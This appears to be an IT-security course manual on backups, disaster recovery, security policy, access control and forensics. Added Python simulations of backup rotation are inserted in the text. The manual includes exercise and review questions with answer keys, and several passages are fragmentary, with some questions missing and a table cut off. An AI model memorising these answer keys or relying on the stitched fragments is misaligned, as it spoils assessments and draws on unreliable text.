Media rotation and retention determine the amount of time a backup should be retained before the media are reused or destroyed. Magnetic tapes deteriorate over time and suffer wear and tear with reuse. Develop a media rotation scheme that is consistent with your company's requirements, and adhere to it.

Who is responsible for backups?

Your backup plan should document who is responsible for performing the backup operator's functions, including changing tapes, sending tapes offsite, performing restores, and examining log files. The plan should also identify the fallback person if the primary operator is unavailable.

Where are backups stored?

A copy of all data should be stored at a site separate from the location of the production network and systems to ensure that destruction of the facility does not compromise all data. When an organization has more than one main office, data should be duplicated and stored at more than one site to ensure business continuity.
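The three backup types and the restore chains they imply, as an added worked example that is not part of the course manual: it models the archive bit on a constructed in-memory file system, runs a full backup followed by three daily backups under the incremental and the differential scheme, and checks each restore by verifying it against the live data, as the verification paragraph above recommends. The file names and the change history are constructed; deleted files are not modelled.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class FileState:
    content: str
    archive_bit: bool = True   # set when a file is created or modified


@dataclass
class BackupSet:
    kind: str                  # "full", "incremental" or "differential"
    day: int
    files: Dict[str, str]      # name -> content captured in this set


class Volume:
    """Constructed in-memory file system: name -> FileState."""

    def __init__(self) -> None:
        self.files: Dict[str, FileState] = {}

    def write(self, name: str, content: str) -> None:
        self.files[name] = FileState(content, archive_bit=True)

    def contents(self) -> Dict[str, str]:
        return {n: f.content for n, f in self.files.items()}


def full_backup(vol: Volume, day: int) -> BackupSet:
    snap = vol.contents()                      # every selected file
    for f in vol.files.values():
        f.archive_bit = False                  # full backup clears all bits
    return BackupSet("full", day, snap)


def incremental_backup(vol: Volume, day: int) -> BackupSet:
    snap = {n: f.content for n, f in vol.files.items() if f.archive_bit}
    for f in vol.files.values():
        f.archive_bit = False                  # bits cleared on copied files
    return BackupSet("incremental", day, snap)


def differential_backup(vol: Volume, day: int) -> BackupSet:
    snap = {n: f.content for n, f in vol.files.items() if f.archive_bit}
    return BackupSet("differential", day, snap)  # bits left set: sets grow


def restore_chain(history: List[BackupSet]) -> List[BackupSet]:
    """Sets to apply, in order, to recover the state after the last backup."""
    last_full = max(i for i, b in enumerate(history) if b.kind == "full")
    chain = [history[last_full]]
    later = history[last_full + 1:]
    chain.extend(b for b in later if b.kind == "incremental")  # every one
    diffs = [b for b in later if b.kind == "differential"]
    if diffs:
        chain.append(diffs[-1])                # only the most recent one
    return chain


def restore(chain: List[BackupSet]) -> Dict[str, str]:
    recovered: Dict[str, str] = {}
    for b in chain:                            # later sets overwrite earlier
        recovered.update(b.files)
    return recovered


def verify(recovered: Dict[str, str], live: Dict[str, str]) -> List[str]:
    """Files whose restored copy differs from the original (empty = good)."""
    return sorted(n for n in live if recovered.get(n) != live[n])


def simulate(daily: Callable[[Volume, int], BackupSet]) -> dict:
    """Full backup on day 0, then one `daily` backup after each day's change."""
    vol = Volume()
    for name in ("payroll.db", "orders.db", "notes.txt"):
        vol.write(name, f"{name} v0")
    history = [full_backup(vol, 0)]
    edits = [(1, "payroll.db"), (2, "orders.db"), (3, "payroll.db")]
    for day, name in edits:                    # constructed change history
        vol.write(name, f"{name} v{day}")
        history.append(daily(vol, day))
    chain = restore_chain(history)
    return {
        "set_sizes": [len(b.files) for b in history],
        "chain_len": len(chain),
        "mismatches": verify(restore(chain), vol.contents()),
    }
```

Calling simulate(incremental_backup) yields four one-file daily sets and a four-set restore chain, while simulate(differential_backup) yields growing daily sets but a two-set chain; both verify clean.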
Media rotation schemes

Several rotation methods are available to provide the ideal balance between cost and reliability. The son method uses the same backup media on a daily basis. This method does not allow for archiving, and you are limited to your last backup for a restore. If the backup is damaged, there is no means to restore the data.
You may want to illustrate the rotation schemes for father-son and grandfather-fatherson methods on the board.
The father-son method combines a full backup and several differential or incremental backups each week. An incremental or differential backup is performed every day of the week, except Friday or the weekend, when a full backup is performed. This method allows you to retrieve files archived from the previous day by using the weekly full backup and then restoring the incremental or differential backup(s).

The grandfather-father-son method is the most commonly used. This method uses the father-son backup on a weekly basis, with the weekly full backup held for an entire month. At the end of the month, a special monthly backup is made, which is kept for one year. This method allows you to archive files for up to a year.

Remote backups

In many backup solutions, communications between a client and server are an open conversation, which means that every file being backed up over the network is sent in clear text. If the production network has high security integrity and a secure firewall in place, this should not be a problem. If the communication is taking place over a WAN connection or outside of the firewall, a virtual private network (VPN) can be used to protect the integrity of the data. Another option is to encrypt the data on the server, so that only authorized users can decrypt the data into a usable format. Even a backup that takes place in an open conversation would then be protected.
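The grandfather-father-son rotation described above, as an added example that is not from the manual: it assigns each calendar day a job, a tape label and the earliest date that tape may be overwritten. It assumes the weekly full runs on Friday, incrementals run Monday to Thursday with nothing at the weekend, the last Friday of a month is the monthly backup, and the retention periods of 7, 28 and 365 days are one reading of the one-week, one-month and one-year periods the text describes.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional, Set

DAILY_TAPES = ("Mon", "Tue", "Wed", "Thu")   # sons: one tape per weekday, reused weekly

# Assumed retention periods (days) for the one-week / one-month / one-year
# generations described in the text.
SON_RETENTION, FATHER_RETENTION, GRANDFATHER_RETENTION = 7, 28, 365


@dataclass(frozen=True)
class Job:
    kind: str          # "incremental" or "full"
    generation: str    # "son", "father" or "grandfather"
    tape: str          # media label; equal labels mean the same physical tape
    reuse_after: date  # earliest date on which the tape may be overwritten


def is_last_friday(day: date) -> bool:
    """True if `day` is a Friday and the next Friday falls in another month."""
    return day.weekday() == 4 and (day + timedelta(days=7)).month != day.month


def plan_for(day: date) -> Optional[Job]:
    """Job scheduled for `day` under the assumed GFS calendar; None at weekends."""
    wd = day.weekday()                      # Monday = 0 ... Sunday = 6
    if wd >= 5:
        return None
    if wd < 4:                              # Monday..Thursday: son
        return Job("incremental", "son", DAILY_TAPES[wd],
                   day + timedelta(days=SON_RETENTION))
    if is_last_friday(day):                 # month-end Friday: grandfather
        return Job("full", "grandfather", f"Month-{day:%Y-%m}",
                   day + timedelta(days=GRANDFATHER_RETENTION))
    week_no = (day.day - 1) // 7 + 1        # other Fridays: father, Week1..Week4
    return Job("full", "father", f"Week{week_no}",
               day + timedelta(days=FATHER_RETENTION))


def plan_for_ymd(year: int, month: int, day: int) -> Optional[Job]:
    return plan_for(date(year, month, day))


def tapes_for_year(year: int) -> Set[str]:
    """Distinct media labels a full year of the rotation touches."""
    labels: Set[str] = set()
    current = date(year, 1, 1)
    while current.year == year:
        job = plan_for(current)
        if job is not None:
            labels.add(job.tape)
        current += timedelta(days=1)
    return labels
```

For a year such as 2024 the rotation touches 20 distinct tapes: four daily, four weekly (a Friday on the 29th or later is always the last of its month, so a Week5 label never occurs) and twelve monthly.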
Offsite storage
Organizations with extensive business-critical data processing and storage requirements should also assess the need for offsite operational facilities. If computer and data access are absolutely necessary for business function, then offsite facilities might be one of the most important components of an effective disaster recovery plan. Offsite facilities allow the business to resume operations if the physical plant suffers a devastating loss, as in the case of the World Trade Center disaster. The three main types of offsite facilities (hot site, warm site, and cold site) are outlined in the following table.
Warm site    Less expensive. Usually exclusive use. Available for long time frames.
Cold site
One option that many organizations pursue is to sign a reciprocal backup agreement with another organization; this means that two parties back up and store each others data. This is a very cost-effective (though not necessarily reliable) way to keep data in separate locations. Another option is to use one of a myriad of Internet-based backup services or various service bureaus that provide the data backup service for a fee. The most expensive, but perhaps most secure, way to back up data is to build and manage a completely redundant in-house network over which the organization has complete control. This level of redundancy may not be necessary for all businesses, but businesses that use the network to address customers, process orders, and keep track of secure transactions should take action to have a hot system available should the need arise. Without such a system, the business might not be able to continue through the disaster recovery process.
Secure recovery
The backup plan should include procedures for proper restoration of the data, should it become necessary. A backup cannot be relied upon until personnel have attempted to actually restore it to a system. Organizations should conduct incident training in which an actual copy of a sample systems data is restored to a backup or secondary system. Spot-checking the readiness to restore systems both checks the effectiveness of backup methods and keeps personnel trained for a quick restore of the system.
Alternate sites

If disaster strikes and you have to recover from an offsite location or alternate site that was previously configured for just such a situation, things can nonetheless get sticky. If at all possible, practice recovery procedures in such a scenario. Develop a plan that outlines the exact steps that need to be taken to recover using the alternate site, and then carry out the plan. At the very least, make sure that key personnel in your organization are comfortable with the roles they would have to play and the actions they would have to take if an alternate site had to be used to recover after a disaster.

Alternate sites should preferably not be in close proximity to your organization's current location, but should still be relatively easily accessible, preferably within driving distance. Say, for example, a hurricane destroys your town. If your alternate site is in the same town, it was probably destroyed too and wouldn't be of any use to you anymore. The hurricane may, however, not have touched areas a few towns over or the next closest metropolitan area. Of course, it's impossible to identify a perfect location, as one cannot predict the nature or magnitude of a disaster. However, when deciding on a location for an alternate site, the distance to the current location should be a balance between practicality and the likely physical extent of a disaster. A general rule to consider is to place an alternate site a minimum of 50 km away. If you are in an area prone to earthquakes, don't place your alternate site on or near the same fault line as the one nearest your current location.
To successfully prepare for system failures, an organization must identify potential threats and analyze what needs to be achieved in order to continue operating as though nothing had happened. Critical information and equipment need to be identified, and procedures must be documented for system and data restoration. After these activities have taken place, network managers can determine how best to protect or restore the mission-critical information systems. A successful disaster recovery plan must rely on thorough planning and testing, and must include provisions for business continuity, without which it would likely fail.

Disaster recovery team

The disaster recovery team should include members of senior management, members of the Information Technology department who will perform the assessment and recovery, representatives from facilities management, and representatives from the user community affected by the event. Each department should be represented because each will have its own objectives and priorities during a crisis. Each team member must know his or her function, which could include coordinating other department personnel, contacting outside emergency agencies, or summoning equipment and service vendors. The most important step in managing potential crises is to have the proper team assembled, trained, and ready to respond at a moment's notice.

Business impact assessment
Explain to students that they will use the business impact assessment to determine how much to spend on the plan, based on the costs of recovery vs. the costs of downtime. In other words, if the company will lose $100,000 per hour of downtime in a disaster, how much will it cost to have a plan that will restore operations in less than an hour? If the costs are $250,000 to restore operation in an hour but only $100,000 to restore operations in two hours, then perhaps the plan should be geared toward a two-hour recovery.
The next step in the disaster recovery planning process is performing the business impact assessment. The business impact analysis identifies your most critical functions and how they would be affected by a disaster. The time frame of the recovery process is the responsibility of the organization. The time frame should reflect the cost of the failure in terms of loss of revenue, the cost of the recovery vs. the cost of the lost revenue, and any acceptable workarounds. Once the allowable outage time has been determined, the feasibility and cost of the recovery must be determined. These issues should be studied carefully, because the expense of recovering from the disaster may be much smaller than the actual loss of revenue and reputation that a company could suffer from not having a solid continuity plan.

Some organizations find it helpful to sort their various business functions into categories. For example, the Massachusetts Institute of Technology has published its Disaster Recovery and Business Resumption Plans, which include the following categories:
• Category I, Critical: Must be restored to maintain normal processing.
• Category II, Essential: Will be restored as soon as resources become available, not to exceed 30 days. (This period is specific to MIT. The length of time in which an essential system should be restored depends on the relative business loss of not restoring it for that time.)
• Category III, Necessary: Will be restored as soon as normal processing is restored; data must be captured and saved for subsequent processing.
• Category IV, Desirable: Will be suspended for the duration of the emergency.
Business resumption and continuity plan

The business continuity plan (BCP), also called the contingency plan, includes details about how to keep the business running when any key component fails. This information includes the personnel responsible for the recovery process, their assignments, the functions that must be operational first, and the process for reinstating key components. Typically, the BCP includes the following items:
• A responsibilities checklist for all members of the BCP team. This list should include contact phone numbers, responsibilities, and backup personnel.
• A list of emergency contacts, such as police, fire department, utility companies, and top-level management.
• A warning system to notify customers and employees that an emergency has occurred and how the plan will proceed.
• Damage assessment, control, and containment procedures.
• Recovery procedures for critical systems.
• Location and access information for remote backup facilities or offsite operational facilities.

Documentation

The disaster recovery plan requires that each phase of disaster recovery be carefully documented. Instructions should be concisely worded so that anyone can follow them without further clarification. The documentation should include the following:
• System configurations for all servers, firewalls, routers, and other key network devices. Include any major modifications made and all patches applied since the systems were placed into production. Also, remember to include key passwords. This document is necessary to restore all vital applications.
• Networking and facilities diagrams. Include diagrams or blueprints of all networking and facilities infrastructure so that it can be re-created at a new site.
• Vendor and supplier lists, in case new equipment needs to be ordered to replace compromised or damaged equipment. This document should also include procedures to assist in a rapid acquisition process.
• The documented backup plan as defined earlier in this unit. The backup procedures must be exhaustively documented with step-by-step instructions on how the backups are done, when they are done, and what information is included. This level of documentation is critical if the systems have to be reconstructed quickly to restore business functionality.
Document storage
All of these documents must be stored in multiple sites: on a hard drive that is consistently backed up; as hard copies stored in secured cabinets or safes in various offices; and at the offsite storage facility. This redundancy ensures that a copy of the disaster recovery plan is accessible at all times should the need to retrieve it arise. This accessibility allows a rapid response to the disaster, thus helping to minimize the business continuity challenges. Note that all copies must be secured, because the documentation will likely include key passwords, file structure documentation, and other mission-critical information that could be used to re-create data if necessary.
A-1: Exercises
1 _________ backups will back up all files selected on a system, whereas _________ backups will save only those files that have been modified since the previous backup, and __________ backups will save only those files that have been changed since the last full backup.
Full, incremental, differential
3 The ____________ rotation method performs an incremental or differential backup every day of the week except Friday, when a full backup is performed. This allows you to retrieve files archived from the previous day, by using the weekly full backup and then restoring the incremental or differential backup(s).
5 Which of the following is an offsite facility that supplies a basic computing environment (wiring, ventilation, plumbing) but no computer hardware?
6 Which of the following documents are found in the disaster recovery plan? (Choose all that apply.)
A A list of the covered disasters
B A list of the disaster recovery team members for each type of situation and their contact information
C A business impact assessment
D Code of ethics
E Backup and restore documentation
A All network administrators
B A member of senior management
C Members of the Information Technology department
D All backup operators
E Representatives from facilities management
F Representatives from the user community
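As an added example (not from the manual), the following Python simulation shows which files each backup type captures under the weekly rotation described in questions 1 and 3, and which backups must be restored, in sequence, to rebuild a given day's state. The file names and edits are constructed sample data.

```python
"""Added example (not from the manual): simulates full, incremental and
differential backups over a week and works out the restore chain each one
needs.  File names and edits are constructed sample data."""
from dataclasses import dataclass, field


@dataclass
class Backup:
    day: str
    kind: str                                    # "full", "incremental" or "differential"
    files: dict = field(default_factory=dict)    # file name -> content captured


class BackupSimulator:
    """Tracks the live files plus the two 'changed since' markers that the
    partial backup types depend on (the archive bit, in effect)."""

    def __init__(self, files):
        self.files = dict(files)
        self.changed_since_full = set(files)     # cleared only by a full backup
        self.changed_since_last = set(files)     # cleared by a full or incremental backup
        self.history = []

    def modify(self, name, content):
        """A file edit made between backups."""
        self.files[name] = content
        self.changed_since_full.add(name)
        self.changed_since_last.add(name)

    def run(self, day, kind):
        """Perform one backup and record it in the history."""
        if kind == "full":
            captured = set(self.files)
            self.changed_since_full.clear()
            self.changed_since_last.clear()
        elif kind == "incremental":
            # files modified since the previous full or incremental backup
            captured = set(self.changed_since_last)
            self.changed_since_last.clear()
        elif kind == "differential":
            # everything changed since the last full backup; marker is left alone
            captured = set(self.changed_since_full)
        else:
            raise ValueError(f"unknown backup kind: {kind}")
        backup = Backup(day, kind, {n: self.files[n] for n in captured})
        self.history.append(backup)
        return backup

    def restore_chain(self, index):
        """Backups that must be restored, in order, to rebuild the state
        captured by history[index]."""
        target = self.history[index]
        i = index
        while i >= 0 and self.history[i].kind != "full":   # walk back to the last full backup
            i -= 1
        if i < 0:
            raise LookupError("no full backup precedes this backup")
        full = self.history[i]
        if target.kind == "full":
            return [full]
        if target.kind == "differential":
            return [full, target]                # the full plus a single differential
        # incremental: the full plus every incremental after it, up to the target
        return [full] + [b for b in self.history[i + 1:index + 1] if b.kind == "incremental"]

    @staticmethod
    def restore(chain):
        """Apply the chain oldest to newest; later copies overwrite earlier ones."""
        state = {}
        for backup in chain:
            state.update(backup.files)
        return state
```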
Redundancy
Explanation
Business continuity focuses on ways to continue your business activities despite equipment failure or destruction. One way to help protect an organization's assets is to have a good deal of redundancy built into all mission-critical systems. These backup systems will be capable of filling in for the main systems until the damage can be repaired. A company that cannot function after a data-loss disaster is a company that will most likely suffer an unrecoverable loss as a result.
Utilities
Discontinuation of utilities, such as electricity, water, and transportation, can greatly affect a company's operations. Natural disasters such as snowstorms and tornadoes can create blackouts and cause equipment failure and absenteeism of critical personnel. To continue normal business functions, administrators need to have contingency equipment and personnel on standby to continue business operations despite adversities. When power outages occur, uninterruptible power supplies (UPSs) can switch over to battery backup and keep attached devices running for up to several hours, allowing time for the administrator to execute a normal shutdown. Additional measures, such as using gas-operated generators, may be implemented to keep servers running. If telephone service is interrupted due to a disaster, then mobile phones and e-mail through broadband access offer alternatives. If postal mail delivery stops, you might need to arrange for mail to be delivered to a different branch office. The key is to identify critical services and provide an alternative method for each one.
Backups
As discussed previously, backing up your data is the most important measure you can take to ensure business continuity. Computers and network equipment can be replaced, but your data is irreplaceable. To prepare for possible disaster, back up your data on a daily basis and store a copy offsite.
B-1:
3 What is clustering?
Clustering is a technology in which several servers jointly perform a single task. Server clustering is also used for fault tolerance: when one server goes down, another takes over.
4 RAID Level __ stores identical copies of the data on multiple disks. If one disk fails, another disk continues to operate. Additional fault tolerance is achieved by duplexing (using separate disk controllers for each disk).
1
5 RAID Level __ writes data across three or more drives, but one drive is used to store the parity bits for each byte that is written to the other disks. When a disk fails, it can be replaced, and the data can be restored to it from the parity information.
3
Security policy
A security policy is a general statement produced by senior management and the Information Technology department to dictate what security means to the organization. The document should establish how the security program is organized, what the policy's goals are, with whom responsibility falls, and what the strategic value of the policy is. An effective policy should include sections on acceptable use, due care, privacy, separation of duties, need-to-know issues, password management, service-level agreements, and the destruction or disposal of information and storage media.
Ask students what legal issues they think should be covered in the acceptable-use policy, both those that protect employees and those that protect the company. Some issues that should be discussed include sexual harassment, copyright, and piracy.
Acceptable-use policies address the use of computer equipment and network resources for personal use or use that is not benefiting the company. The goals of the policy are to meet the productivity goals of the Human Resources department, meet the liability concerns of the Legal department, protect critical information and technical resources, and maintain the security goals of the Information Technology department. Organizations have been concerned about the misuse of computer resources and its impact on business activity for some time. As Internet use has grown, so has the abuse of business resources for personal use. Many studies have focused on the impact this type of misuse has on productivity and the lost revenue associated with it. Lost productivity is not the only concern, however. Just as damaging are situations in which company information is compromised by employees using the Internet to communicate sensitive information to external parties, by the use of company resources to view sexually explicit or socially unacceptable Web pages, or when an organization is held legally responsible for promises made by an employee using the company's e-mail system. An acceptable-use policy should cover what is and is not considered appropriate use of company resources and time. The document should be read and signed by employees when they are hired, and held in the employee file in case of any future violations. The enforcement mechanism of the policy should also be well established to ensure that all employees understand the consequences of their actions.
Due care
To exercise due care means that reasonable precautions are being taken; these indicate that an organization is being responsible. If a corporation were to experience a major security-related incident that escalated because of a lack of countermeasures or incident response, those who are adversely affected (shareholders, business partners, customers) may have grounds for suing on the basis of a failure to exercise due care. By establishing a solid security policy and adhering to its basic tenets, a company can prove that it has exercised due care and can protect itself from lawsuits.
Privacy
When implementing a security policy, managers must understand the necessity of protecting customer and supplier data. By securing this data, an organization can solidify the trust between itself and any external parties that have confidential information on the organization's network. This information can consist of financial information, Social Security numbers, partner contracts, sale prices, and so forth. If an organization does not respect its clients' and partners' right to privacy, it can lose the trust of those parties, or in some cases face legal action for intentionally or unintentionally divulging that information.
The bottom line here is that nobody in the organization should be seen as irreplaceable, because one day he or she likely will be replaced, and the smoother the transition, the better. Explain that many employees purposely provide poor documentation of their work so that it will be that much harder to know how to replace their duties. The company may then have a dilemma: pay this person what he/she demands, or incur the costs of lost productivity when he/she leaves. The best strategy is to incur the costs and make sure the next person does not leave you in such a predicament.
The plan should also include training on proper password procedures. IT management may want to use password-scanning tools to find weak passwords. If weak passwords are found on the system, the users responsible for the weak passwords should be notified and instructed on how to create stronger passwords.
Service-level agreements
A service-level agreement (SLA) is a contractual understanding between a service provider and the end user, which binds the provider to a specified and documented level of service. A well-constructed SLA should include specific levels of service and support and should include penalty clauses in the event that the services or support are not provided. An organization should specifically request a disaster recovery plan with any SLA. If the service provider goes down or has a service interruption, all organizations using the service could suffer as if the outage were their own. Backup plans need to be in place in case of a provider failure. These plans must include a short-term solution to ensure business continuity during the initial recovery period.
Disposal and destruction
Many companies that have established strong system-access guidelines carelessly dispose of documents, systems, and media that contain data or could potentially help to compromise systems. Most people do not consider the need to properly dispose of old storage media and unused equipment. Deleting files, reformatting, and overwriting disks does not completely eliminate all information. The best way to dispose of important information or hardware that contains such information is to have the medium degaussed. Degaussing is the process of demagnetizing the media so that all information is rendered useless. Another technique that effectively disposes of data is zeroization, which overwrites all data with zeros. A more extreme approach is physical destruction, whether that means breaking floppy disks and destroying the magnetic disk inside or physically destroying equipment. This is often the surest way to dispose of critical information. In addition to disposing of storage media and unused equipment, companies need to destroy hard copies of any vital information by shredding, pulping, or burning it. An emergency destruction plan should be in place when organizations work with highly sensitive information such as data that is vital to national security, or work with the Department of Defense or other government agencies.
C-1:
2 Why is separation of duties an important measure to consider when developing a security policy?
Distributing high-risk activities among the technology community reduces the level of trust it places on one person and prevents a disgruntled employee from doing extensive damage to the network.
Minimum length
Allowed character set
Disallowed strings
Duration of use of the password
All of the above
C-2:
2 Which of the following tasks should be performed with an employee's termination? (Choose all that apply.)
A Conduct exit interviews professionally.
B Collect security badges and company property.
C Change all locks on the building.
D Escort the employee off the property.
E Deactivate the employee's accounts and change passwords.
C-3:
Use IDS to detect malicious code and analyze anomalies.
Allocate sufficient resources to support an appropriate level of incident response.
Ensure that the systems and applications used in handling incidents are resistant to attack.
Identify who is to be contacted in the event of an incident, and list their responsibilities.
Establish acceptable risk limits.
Managing privileges for a group is essentially the same as managing privileges for an individual, except that you have a single entry in the access control list instead of many. The administrator creates a group, assigns members to the group, and then grants group privileges to all required network resources. Each member within the group automatically inherits all privileges granted to that group. Thus, if the Accounting group is granted Read/Write access to data within the Accounts Payable folder, any new employee added to the Accounting group automatically receives Read/Write privileges as well. Users can be members of several groups at once. The privileges assigned to each group of which the user is a member are combined to create the user's effective permissions.
Role management
Some network OSs, such as Novell NetWare and Microsoft Windows 2000, allow the administrator to control access through roles. The administrator creates a role to represent a particular position or function within the organization, and then assigns resource privileges on a need-to-use basis. For example, an insurance company can create roles that include claims adjuster, actuary, underwriter, and account executive. Once the role is created, a user is assigned to the role, thereby inheriting all permissions granted to the role.
Single sign-on
Single sign-on (SSO) allows a user to log onto several servers or applications by using a single logon sequence. This eliminates the necessity to memorize a different password for each application. In addition, the administrator can manage the user accounts from a single, central location. Most network operating systems today provide some means of SSO. Microsoft and Novell use directory services to accomplish the single sign-on. The directory service issues a digital certificate after authentication to grant access to all authorized services within the directory. Alternatively, applications using Kerberos issue session tickets that can be used repeatedly to transparently sign onto other systems.
D-1:
2 ______________ describes the privileges assigned to a particular user. By default, the file owner receives full control of any files or directories that he or she creates.
4 Single sign-on allows a user to log onto several servers or applications by using a single logon sequence. True or false?
True
Topic B
Topic C
Topic D
Review questions
1 Outages can be caused by various events. What are they?
A Hardware failure
B Network failure
C Software error
D Malicious attack
2 The best way to establish an incident response policy is to follow which distinct steps? (Choose all that apply.)
A Detection
B Containment
C Backup
D Preparation
E Eradication
F Auditing
3 A disaster recovery plan defines the resources, actions, and data required to reinstate critical business processes that have been damaged or disabled because of a disaster. True or false?
True
4 Accidental threats are loss of power, transportation accidents, chemical contamination, and so forth. True or false?
True
A Hot site
B Neutral site
E Freeze site
6 An advantage of a hot site is that the site is ready for operation within hours. True or false?
True
7 A warm site has no hardware infrastructure, is not immediately available, and operational testing is not available. True or false?
False. This describes a cold site.
8 How far away from your organization's current location should an alternate site be minimally located?
50 km
9 An effective backup strategy should take into account what key issues?
A How often should the backups be run?
B What is the backup medium?
C How long will backups be stored?
D Will the backups be manual or automated?
E How will backups be verified?
10 An incident response policy is a written policy that covers how to deal with a security incident after it has transpired. True or false?
True
11 Privacy policies are not legally enforceable, so they give consumers no recourse if their information is misused. True or false?
False. They are legally enforceable.
13 A full system restore can be difficult and time consuming, yet it offers the highest level of assurance that systems and network components have been returned to normal operational status. True or false?
True
14 Adopting an incident response methodology constitutes the practice of due care and, if need be, can be established as such in a court of law. True or false?
True
E Explain the importance of documentation
Digital evidence
Digital evidence is essentially information and data of investigative value that is stored on or transmitted by an electronic system such as a computer. Such evidence is acquired when data, media, or hardware are collected and stored for examination purposes. Digital evidence is:
- Extremely volatile and susceptible to tampering
- Often concealed
- Sometimes time sensitive
A knowledgeable expert who can identify what may be requested as relevant evidence can help speed up the discovery process during forensic investigations. For cases where computer disks are not actually seized or forensically copied, the forensics expert can more quickly identify places to search, signs to look for, and other potential information sources to be used as evidence during on-site inspections. Such evidence may take the form of earlier versions of data files that may still exist on computer hard disk drives or backup media, or differently formatted versions of data created or processed by applications (such as word-processing programs, spreadsheets, e-mail, graphics programs, or the like).
The Working Group proposed the following principles for the collection, preservation, and access of digital evidence, which were voted upon by the IOCE delegates and gained unanimous approval:
- Investigation and analysis performed on the seized digital evidence should not change the evidence in any form. Except where necessary, evidence should only be manipulated and analyzed on a copy of the original source, leaving the actual violated data and hardware intact.
- An individual must be forensically competent in order to be given permission to access original digital evidence. Several organizations have created training programs and certificates in computer forensics, although none has emerged as a de facto standard. Despite this, there is a set of widely accepted methods and practices that are common to most programs and should be applied by any forensic analyst.
- All activity relating to the seizure, access, storage, or transfer of digital evidence must be fully documented, preserved, and available for review.
Forensic process
Digital evidence poses special challenges for its admissibility in court. To address such legal issues, the following steps should be employed.
Preparation
Preparation is the key to success in digital forensics. A little bit of effort before the breach ever happens can make the forensic process significantly easier, quicker, and more reliable. Appropriate training and the creation of toolkits for various operating systems are critical to a proper analysis.
Collection of evidence
Collection involves the search for and recognition, recovery, and documentation of digital evidence. Digital evidence may involve real-time or stored information that may be lost unless precautions are taken at the crime scene.
Authentication
Authentication involves the generation of mathematical validation codes of collected digital evidence. This helps resolve questions that might be raised during litigation about the accuracy of the evidence.
Examination of evidence
Examination helps to make the evidence visible and explain its origin and significance. It should document all components of the captured evidence in its entirety. Such documentation allows all parties to discover what is contained and presented by the evidence. This process includes the search for information that may be hidden or obscured.
Analysis of evidence
Analysis differs from the examination phase in that it inspects the outcome of the examination of the evidence for its significance and value to the case.
Documenting and reporting of evidence
Documentation is not really done as the last step in the sequence but is an ongoing process throughout the other steps. The type and format of documentation is partially dictated by the intended use of the report that is generated. An analysis that is performed primarily to generate a better patch to avoid future breaches may have substantially different documentation from one that is intended to be used in a criminal prosecution.
There are other models with greater or fewer steps; however, all contain the same basic processes.
Preparation
A good forensic analyst must be very much of a generalist, with broad experience and training. A security breach generally happens only because network or systems administrators were not prepared for it, so understanding the methods used to gain access requires a breadth of knowledge. Experience in network function, intrusion detection techniques, logging, and operating system configuration is necessary. A good toolkit must be prepared in advance of the need for forensic analysis. Once a system has been breached, the first indications of how the attacker gained access help focus the investigation on the compromised system. These toolkits should be set up as part of any good security system but should be established with forensics in mind: don't assume that your users will be doing things that are expected.
Collection of evidence
If evidence is to be admissible in court, it must be handled properly. The data and memory on the system should be treated as the state of a crime scene and must not be modified, because it may be impossible to reconstruct. Even running forensic tools on a system to collect data may remove critical information from the system. Many forensic activities require administrator or root-level access, and many actions taken with that authority cannot be undone. Forensic investigators should use the following guidelines as a basis for formulating the evidence collection procedure:
- Capture a picture of the system and its surroundings. You may even want to videotape the entire process while the analyst works on the system to have an indisputable record for later use.
- Keep detailed notes. These should include dates and times of all actions taken at the site. Because it's difficult to keep up with all the output and potential system errors (and because installing a text capture program would modify the system), a good suggestion is to record the server and surrounding area with a video camera and then set it up on a tripod, focusing the camera on the terminal monitor.
- Limit direct access to the file system as you are collecting the evidence and avoid updating files or the directory access table.
- If possible, analysis should be done on a bit-level copy of the system's storage media, rather than the original. The original can be kept secure should the authenticity of the data ever come into question later.
Volatility
Collecting evidence may actually destroy other evidence. While collecting digital evidence, forensic investigators should proceed from the more volatile assets to the less volatile ones. Following is a typical order of volatility for most systems:
- Memory
- Registry, routing table, ARP cache, process table
- Network connections
- Temporary files
- Disk or storage device
The digital evidence collection procedure should be documented in detail to avoid litigation issues. The documentation of collection procedures should lessen the amount of decision-making needed during the collection process. However, the analyst must modify the procedures to follow where the evidence leads, instead of blindly following a set of procedures. It is important to make sure that the methods of evidence collection are as transparent as possible. Such actions should not alter the media that holds the potential evidence. Investigators should be prepared to disclose the collection methods. Forensic investigators should pay close attention to the following guidelines:
- Do not run programs that modify files or their access times.
- Do not shut down until the most volatile evidence has been collected.
- Do not trust the programs on the system. It is common to find that critical forensic tools have been replaced with trojanized versions, which can provide false or misleading output.
Collection steps
- Begin by making a list of all the systems, software, and data involved in the incident, as well as the evidence to be collected. Establish criteria regarding what is likely to be relevant and admissible in court.
- Remove all external factors that may cause accidental modification of the file system or system state.
- Perform a quick analysis of external logs and IDS output to provide a hint of where to focus the investigation on the target system.
- Following the levels of volatility, check the processes running on the system, looking for any that appear out of place, and then copy the ARP cache, routing table, registry, and status of network connections, including detecting promiscuous NICs. A good toolkit includes a utility to do a core dump of the memory, so that information can be preserved as well.
- Capture temporary files that may be deleted if the system is shut down and rebooted.
- Remember to run all programs from a trusted read-only source and write the results to the screen and removable media.
- Finally, make a bit-by-bit copy of the entire media to a backup device. Once the backup is complete and all physical network structures and hardware specifications have been recorded, the original media should be removed and stored in a secure location. Further analysis can be done on the same or another system after the backup has been restored on another hard drive.
Authentication and evidence handling procedures
It is important to be able to prove that neither the original data nor the analyzed data has been tampered with. Experienced computer forensic specialists rely upon mathematical validation to verify that the restored image of a computer disk drive and relevant files exactly match the contents of the original computer. Authenticating the evidence resolves questions about the accuracy of the restored mirror image that may be raised during litigation. Electronic signatures also act as a means of protection for the computer forensic specialist against potential allegations that files were altered or planted by law enforcement officials during the processing of the computer evidence. The physical media on which the digital evidence is stored must be carefully guarded. After removing it from the system, the disk or entire system should be placed in a container that is labeled, sealed, signed, and dated in a manner in which tampering will be obvious. The container should be locked so that access is limited to the people who must have it. From that point on, only the copy of the data should be used for analysis, unless that becomes corrupt or the original is needed to validate the accuracy of the data on the copy. Part of the evidence-handling process must be to maintain a chain of custody to keep track of the individuals who have accessed the evidence. Investigators should create a chain-of-custody form and manage it very carefully during and after the forensic investigation. Mismanagement of the chain of custody could result in legal complications, which can consequently prevent prosecution. A typical chain-of-custody form should include:
- The individual(s) who discovered the evidence.
- The exact location of evidence discovery.
- The date and time when the evidence was discovered.
- The individual(s) who initially handled or processed the evidence.
- The location, date, and time when the evidence was initially processed.
- The individuals who had custody of the evidence, the period during which they had custody, and how the evidence was stored during that period.
